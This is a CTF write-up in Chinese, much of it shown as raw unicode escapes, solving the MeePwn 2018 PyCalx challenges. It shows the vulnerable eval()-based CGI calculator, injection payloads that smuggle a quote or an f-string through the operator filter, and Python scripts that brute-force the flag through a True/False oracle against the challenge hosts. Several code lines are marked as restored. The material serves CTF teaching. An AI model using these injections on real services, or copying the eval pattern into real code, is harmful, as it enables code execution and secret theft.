PyCalx&PyCalx2-MeePwn-2018

点图有小惊喜哦~


PyCalx1

题目信息

This code is supposed to be unexploitable :/ another pyjail?

Notice: The flag may contain non alphabetic characters (but still printable)

Please login to submit flag

\u8fdb\u53bb\u4e4b\u540e\u662f\u8fd9\u4e2a\u6837\u5b50\u7684


\u70b9\u51fbSource\u6211\u4eec\u53ef\u4ee5\u67e5\u770b\u8fd9\u4e2a\u7a0b\u5e8f\u7684\u6e90\u7801


\u4ee3\u7801\u8c03\u8bd5

\u4ed4\u7ec6\u9605\u8bfb\u4e86\u4e00\u4e0b\u4ee3\u7801\uff0c\u8fd9\u662f\u4e00\u4e2a\u6709\u9650\u5236\u7684Python\u8868\u8fbe\u5f0f\u8fd0\u7b97\u7684\u4e1c\u897f\u3002 \xa0

\u6d89\u53ca\u7684\u53d8\u91cf\u5305\u62ecsource\uff0cop\uff0cvalue1\uff0cvalue2\uff0cFLAG\u56db\u4e2a\u3002\xa0
-\xa0source\uff0c\u82e5\u503c\u4e3a1\u5219\u663e\u793a\u6e90\u4ee3\u7801\u3002\xa0
-\xa0value1\uff0c\u8fd0\u7b97\u7684\u7b2c\u4e00\u4e2a\u53d8\u91cf\u3002\xa0
-\xa0value2\uff0c\u8fd0\u7b97\u7684\u7b2c\u4e8c\u4e2a\u53d8\u91cf\u3002\xa0
-\xa0op\uff0c\u8fd0\u7b97\u7b26\u3002\xa0
-\xa0FLAG\uff0c\u8bfb\u53d6FLAG\uff0c\u5b58\u5728\u53d8\u91cf\u91cc\u9762\u3002


这里还通过两个函数分别对运算变量和运算符进行了限制。

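def get_value(val):
    """Validate one operand of the calculator and return it.

    The input is cut to 64 characters. An all-digit string is returned as an
    ``int``. Any other string is returned unchanged, unless it is empty or
    contains a blacklisted character; in that case an error line is printed
    and the process exits with status 0.

    Review note: this is a character deny-list placed in front of ``eval()``.
    Every character that is not listed (spaces, ``#``, ``{``, ``}``, letters,
    ...) passes through, so the filter on its own does not make the operand
    inert once it is spliced into the evaluated expression.
    """
    val = str(val)[:64]
    if str(val).isdigit():
        return int(val)
    # The closing part of this literal was lost when the page was extracted;
    # it is restored from the write-up's own description of the blacklist.
    blacklist = ['(', ')', '[', ']', '\'', '"']  # I don't like tuple, list and dict.
    if val == '' or any(ch in val for ch in blacklist):
        print('<center>Invalid value</center>')
        sys.exit(0)
    return val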

get_value()这个函数首先是限制变量的有效长度为64，然后还通过黑名单(，)，[，]，'，"限制变量字符。

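def get_op(val):
    """Validate the operator field and return it (at most two characters).

    The input is cut to two characters. It is rejected (error line printed,
    process exits with status 0) when it is empty or when its FIRST character
    is not in ``list_ops``.

    Review note: only ``val[0]`` is checked. The second character is returned
    to the caller unchecked, which is the gap the write-up goes on to discuss.
    A stricter check would compare the whole value against an allow-list of
    complete operators instead of testing a single character.
    """
    val = str(val)[:2]
    # The closing part of this literal was lost when the page was extracted;
    # it is restored from the write-up's own description of the list.
    list_ops = ['+', '-', '/', '*', '=', '!']
    if not val or val[0] not in list_ops:
        print('<center>Invalid op</center>')
        sys.exit(0)
    return val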

get_op()这个函数首先是限制运算符的有效长度为2，然后通过白名单+，-，/，*，=，!限制了运算符的第一个字节，第二个字节没做限制。


\u901a\u8fc7\u4e0a\u9762\u7684\u51fd\u6570\u5bf9\u53d8\u91cf\u8fc7\u6ee4\u540e\uff0c\u8fd9\u91cc\u5c31\u662f\u5bf9\u8f93\u5165\u7684\u5185\u5bb9\u8f6c\u5316\u4e3a\u5b57\u7b26\u4e32\u62fc\u63a5\u6210\u4e3acalc_eval\u8868\u8fbe\u5f0f

# Assemble the expression text: both operands go through repr(), the operator
# is inserted as-is between them.
calc_eval = repr(value1) + str(op) + repr(value2)

# ...... (lines omitted in the write-up)

try:
    # SECURITY: eval() runs text built from request parameters; the operand and
    # operator filters shown on this page are the only barrier in front of it.
    result = str(eval(calc_eval))
    # Only digits or a boolean are echoed back.
    # Sorry we don't support output as a string due to security issue.
    shown = result if (result.isdigit() or result in ('True', 'False')) else "Invalid"
    print(shown)
except:
    print("Invalid")

\u6700\u540e\u901a\u8fc7eval()\u6267\u884ccalc_eval\u8868\u8fbe\u5f0f\uff0c\u8fd4\u56de\u7ed3\u679c\u8f6c\u5316\u4e3a\u5b57\u7b26\u4e32\xa0

\u5982\u679c\u5b57\u7b26\u4e32\u6ee1\u8db3\u6570\u5b57,True\uff0cFlase\u8fd9\u4e09\u79cd\u5f62\u5f0f\uff0c\u5c31\u5728\u9875\u9762\u8f93\u51fa\uff0c\u5426\u5219\u8f93\u51faInvalid\u9519\u8bef\u63d0\u793a


Bool\u56de\u663e\u578b\u6ce8\u5165

\u4e3a\u4e86\u4fbf\u4e8e\u5206\u6790\uff0c\u628a\u4ee3\u7801\u7cbe\u7b80\u6210\u672c\u5730\u8c03\u8bd5\uff0c\u4e3b\u8981\u662f\u8c03\u8bd5eval()\u4e2d\u7684\u8bed\u53e5\u3002

# coding=utf-8

import sys

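if __name__ == "__main__":
    # Local harness for studying the string that reaches eval(). It mirrors
    # the challenge's filters so the expression can be inspected offline; it
    # is a debugging aid, not something to expose to untrusted input.

    # Stand-in for the secret: the contents of a local file.
    with open('index.php', 'r') as handle:
        FLAG = handle.read()

    def get_value(val):
        """Cut to 64 chars; digits -> int; reject empty or blacklisted input."""
        val = str(val)[:64]
        if str(val).isdigit():
            return int(val)
        # Literal restored: its tail was lost when the page was extracted.
        blacklist = ['(', ')', '[', ']', '\'', '"']  # I don't like tuple, list and dict.
        if val == '' or [c for c in blacklist if c in val] != []:
            print('<center>Invalid value</center>')
            sys.exit(0)
        return val

    def get_op(val):
        """Cut to 2 chars; only the first character is checked against list_ops."""
        val = str(val)[:2]
        # Literal restored: its tail was lost when the page was extracted.
        list_ops = ['+', '-', '/', '*', '=', '!']
        if val == '' or val[0] not in list_ops:
            print('<center>Invalid op</center>')
            sys.exit(0)
        return val

    # Inputs under test; edit these to see what expression text is produced.
    op = "+"
    value1 = "123"
    value2 = " 123"
    # Not used by the statements below; it exists so that an evaluated
    # expression can refer to the name `source`.
    source = 'error_reporting'

    op = get_op(op)
    value1 = get_value(value1)
    value2 = get_value(value2)

    calc_eval = str(repr(value1)) + str(op) + str(repr(value2))
    # print() with one argument behaves the same on Python 2 and Python 3.
    print(calc_eval)

    # SECURITY: deliberate reproduction of the vulnerable sink for analysis.
    result = str(eval(calc_eval))
    print(result)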


* * \u76ee\u6807\u6e05\u6670 \uff1a**Flag\u5df2\u7ecf\u5b58\u5728\u4e86\u53d8\u91cfFLAG\u91cc\u9762\uff0c\u7ed5\u8fc7\u8fc7\u6ee4\uff0c\u6ce8\u5165\u8868\u8fbe\u5f0f\u5230eval()\u91cc\u9762\uff0c\u6267\u884c\u4ee3\u7801\uff0c\u83b7\u53d6Flag\u3002

calc_eval = str(repr(value1)) + str(op) + str(repr(value2))


repr()\u8fd9\u4e2a\u51fd\u6570\u5f88\u5173\u952e\xa0

repr()\xa0\u51fd\u6570\u5c06\u5bf9\u8c61\u8f6c\u5316\u4e3a\u4f9b\u89e3\u91ca\u5668\u8bfb\u53d6\u7684\u5f62\u5f0f\uff0c\u5f53\u4f20\u5165\u4e0d\u662f\u6570\u5b57\u662f\u5b57\u7b26\u4e32\u7684\u65f6\u5019\uff0c\u4f1a\u5f15\u5165\u5f15\u53f7\'\uff0c\u6548\u679c\u5982\u4e0b\xa0

\u56e0\u4e3aget_value\u8fc7\u6ee4\u7684\u5b58\u5728\uff0c\u8fd9\u91cc\u65e0\u6cd5\u76f4\u63a5\u901a\u8fc7value1,value2\u5f15\u5165\u5355\u5f15\u53f7\u8fdb\u884c\u5355\u5f15\u53f7\u9003\u9038\u3002\xa0

\u4f46\u662f\u56e0\u4e3aget_op\u4ec5\u4ec5\u8fc7\u6ee4\u9a8c\u8bc1\u4e86\u7b2c\u4e00\u4f4d\u5b57\u7b26\uff0c\u56e0\u6b64\u6211\u4eec\u53ef\u4ee5\u5728\u7b2c\u4e8c\u4f4d\u5f15\u5165\u5355\u5f15\u53f7\u3002\xa0value1=a\uff0cvalue2=a\uff0cop=+\'

\' a \' + \' \' a \'

\u8fd9\u65f6\u5019\u8fdb\u5165eval\u80af\u5b9a\u4f1a\u56e0\u4e3a\u8bed\u6cd5\u62a5\u9519\uff0c\u8fd9\u65f6\u5019\u4fee\u6539value2=#a\uff0c\u6ce8\u91ca\u540e\u9762\u7684\u5355\u5f15\u53f7

\' a \' + \' \' #a \'

\u7b49\u4ef7\u4e8e

\' a \' + \' \'

那么同时也逃逸了单引号，在#号的前面我们已经可以注入其他运算符了
value1=a，value2=and 1#a，op=+'

' a ' + ' '  and 1#a '

等价于，先加法后与运算

' a ' + ' '  and 1

\u9003\u9038\u51fa\u4e86\u5355\u5f15\u53f7\uff0c\u4f46\u662f\u4ecd\u7136\u65e0\u6cd5\u76f4\u63a5\u6253\u5370\u51faFlag\uff0c\u56e0\u4e3a\u9875\u9762\u8fd4\u56de\u5fc5\u987b\u6ee1\u8db3\u6570\u5b57,True\uff0cFlase\u8fd9\u4e09\u79cd\u5f62\u5f0f\u624d\u6709\u56de\u663e\uff0c\u8fd9\u91cc\u53ef\u4ee5\u786e\u5b9a\u662f\u901a\u8fc7Bool\u8fd4\u56de\u503c\u5bf9Flag\u8fdb\u884c\u731c\u89e3\u3002

\u9996\u5148\u60f3\u5230\u7684\u662f\u8fd9\u79cd\u5f62\u5f0f\xa0value2=and ord(Flag[1]) ==100 #

\' a \' + \' \' and ord(Flag[1]) ==100 #\'

\u4f46\u8fc7\u6ee4\u7684\u51fd\u6570get_value\u5bfc\u81f4\u65e0\u6cd5\u8c03\u7528\u6709\u7528\u7684ord()\u51fd\u6570\uff0c\u540c\u6837\u65e0\u6cd5\u4f7f\u7528[index]\uff0c\u548c\u7c7b\u4f3c\u7684\u3002

\u8fd9\u65f6\u5019\u5c31\u8981\u7528\u5230\u524d\u9762\u7684source\u53d8\u91cf\u4e86

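# `source` is read straight from the request and, unlike value1/value2/op, is
# not passed through get_value() or get_op(). The name is still bound after
# this block, so it stays reachable from the expression evaluated later.
if 'source' in arguments:
    # Subscript restored: its closing part was lost when the page was extracted.
    source = arguments['source'].value
else:
    source = 0

# Only the exact string '1' triggers the source listing; any other value is
# simply kept in `source`.
if source == '1':
    print('<pre>' + escape(str(open(__file__, 'r').read())) + '</pre>')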

source\u8d4b\u503c\u4f7f\u7528\u540e\u4ecd\u7136\u5b58\u5728\uff0c\u662f\u6211\u4eec\u7684\u53ef\u63a7\u70b9\uff0c\u4e14\u65e0\u8fc7\u6ee4\u51fd\u6570\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u5b83\u914d\u5408in\u8fdb\u884c\u731c\u89e3Flag\uff0c\u731c\u89e3\u6210\u529f\u9875\u9762\u8fd4\u56deTrue\uff0c\u9519\u8bef\u5219\u8fd4\u56deFlase\xa0
value1=a\uff0cvalue2=and True and source in FLAG#\uff0cop=+\'\uff0csource=xxx

\'a\' + \' \' and True and source in FLAG#\'


EXP

\u8fd9\u91cc\u6211\u4eec\u76f4\u63a5\u7f16\u5199\u811a\u672c\uff0c\u901a\u8fc7GET\u53c2\u6570source\u4fee\u6539\u66b4\u529b\u731c\u89e3FLAG

http://178.128.96.203/cgi-bin/server.py?value1=t&op=%2B%27&value2=+and+True+and+source+in+FLAG%23&source=MeePwnCTF%7Bpython3.66666666666666_%28%5B_%28%28you_passed_this%3F%5D%5D%5D%5D%5D%5D%29%7D


# coding=utf-8

import string

import requests

import sys

from urllib import quote

# Python 2 script (print statement, `from urllib import quote`).
# Boolean-oracle loop against the challenge host: every request carries the
# already-known flag prefix plus one candidate character from reg_str in the
# `source` parameter, and the candidate is kept when the response contains
# the True marker tested below.
# Defender view: in the server's request log this shows up as a long run of
# GETs to server.py that are identical except for the tail of `source`, with
# `op` containing an encoded quote (%27) and `value2` ending in an encoded
# `#` (%23).
# NOTE(review): the marker literal spans a blank line here; this page has a
# blank line between every code line, so that blank line is presumably an
# extraction artifact rather than part of the original literal.
if __name__ == \'__main__\':

\xa0 \xa0reg_str = string.punctuation + string.ascii_lowercase + string.ascii_uppercase + string.digits

\xa0 \xa0Flag = "MeePwnCTF{"

\xa0 \xa0url = "http://178.128.96.203/cgi-bin/server.py?value1=t&op=%2B%27&value2=+and+True+and+source+in+FLAG%23&source=" + quote(

\xa0 \xa0 \xa0 \xa0Flag)

\xa0 \xa0for i in range(100):

\xa0 \xa0 \xa0 \xa0for x in reg_str:

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0url_t = url + quote(x)

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0print url_t

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0html = requests.get(url_t).content

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0if \'\'\'True

>>>\'\'\' in html:

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0url = url_t

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0Flag = Flag + x

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0print Flag

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0break

\u6700\u540eFlag\u4e3a

MeePwnCTF{python3.66666666666666_([_((you_passed_this?]]]]]])}


PyCalx2

题目信息

You should solve PyCalx first.

\u5144\u5f1f\u9898\u76ee\uff0c\u548c\u4e0a\u4e00\u9898\u7684\u51e0\u4e4e\u6ca1\u505a\u6539\u52a8\uff0c\u53ea\u662f\u53c8\u589e\u52a0\u4e86\u5bf9op\u7684\u8fc7\u6ee4\uff0c\u5f15\u53f7\'\u5df2\u7ecf\u4e0d\u80fd\u4f7f\u7528\u4e86

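# In this version `op` passes through get_value() first, so the quote and
# bracket characters on its blacklist are rejected here too. get_op() still
# checks only the first character, so the second character may be any
# character that get_value() lets through.
# Subscript restored: its closing part was lost when the page was extracted.
op = get_op(get_value(arguments['op'].value))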

\u6839\u636e\u4e0a\u4e00\u9898\u7684Flag\uff0c\u53ef\u4ee5\u77e5\u9053\u7248\u672c\u662fpython3.6\uff0c\u8fd9\u91cc\u9700\u8981\u4f7f\u7528F-strings.\xa0

\u5728python3.6.2\u7248\u672c\u4e2d\uff0cPEP 498 \u63d0\u51fa\u4e00\u79cd\u65b0\u578b\u5b57\u7b26\u4e32\u683c\u5f0f\u5316\u673a\u5236\uff0c\u88ab\u79f0\u4e3a\u201c\u5b57\u7b26\u4e32\u63d2\u503c\u201d\u6216\u8005\u66f4\u5e38\u89c1\u7684\u4e00\u79cd\u79f0\u547c\u662fF-strings\xa0

F-strings\u63d0\u4f9b\u4e86\u4e00\u79cd\u660e\u786e\u4e14\u65b9\u4fbf\u7684\u65b9\u5f0f\u5c06python\u8868\u8fbe\u5f0f\u5d4c\u5165\u5230\u5b57\u7b26\u4e32\u4e2d\u6765\u8fdb\u884c\u683c\u5f0f\u5316\u3002

\u4f7f\u7528F-strings\u6211\u4eec\u4e0d\u7528\u9003\u9038\u5355\u5f15\u53f7\uff0c\u56e0\u4e3a\u5b83\u652f\u6301\u8868\u8fbe\u5f0f\u3002 \xa0

\u9996\u5148\u60f3\u5230\u7684\u4e09\u5143\u8868\u8fbe\u5f0f\uff0c\u4f46\u662fPython\u4e2d\u5e76\u6ca1\u6709\uff0cemm........\uff0c\u4f7f\u7528\u540c\u529f\u80fd\u7684if else\xa0

value1 = True\uff0cvalue2\xa0={source*0 if source in FLAG else 233}\xa0\uff0cop\xa0=\xa0+f\xa0

\u6267\u884c\u7684\u4ee3\u7801\u4e3a\uff1a\xa0

\'True\'+f\'{source*0 if source in FLAG else 233}\'

\u5982\u679c\u5339\u914d\u6210\u529f\u8fd4\u56deTrue\uff0c\u5339\u914d\u5931\u8d25\u8fd4\u56deTrue233



EXP

直接修改前一个题的脚本

# coding=utf-8

import string

import requests

import sys

from urllib import quote

# Python 2 script (print statement, `from urllib import quote`).
# Same Boolean-oracle loop as the PyCalx1 script on this page; only the host
# and the fixed query string differ. Here `op` is `+f` (%2Bf) and `value2`
# is a brace-delimited expression (%7B ... %7D), so the second operand is
# evaluated as an f-string.
# Defender view: in the server's request log this shows up as a long run of
# GETs to server.py that are identical except for the tail of `source`, with
# a letter in the second position of `op` and encoded braces in `value2`.
# NOTE(review): the marker literal spans a blank line here; this page has a
# blank line between every code line, so that blank line is presumably an
# extraction artifact rather than part of the original literal.
if __name__ == \'__main__\':

\xa0 \xa0reg_str = string.punctuation + string.ascii_lowercase + string.ascii_uppercase + string.digits

\xa0 \xa0Flag = "MeePwnCTF{"

\xa0 \xa0url = "http://206.189.223.3/cgi-bin/server.py?value1=True&op=%2Bf&value2=%7Bsource*0+if+source+in+FLAG+else+233%7D&source=" + quote(

\xa0 \xa0 \xa0 \xa0Flag)

\xa0 \xa0for i in range(100):

\xa0 \xa0 \xa0 \xa0for x in reg_str:

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0url_t = url + quote(x)

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0print url_t

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0html = requests.get(url_t).content

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0if \'\'\'True

>>>\'\'\' in html:

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0url = url_t

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0Flag = Flag + x

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0print Flag

\xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0break

Flag：MeePwnCTF{python3.6[_strikes_backkkkkkkkkkkk)}

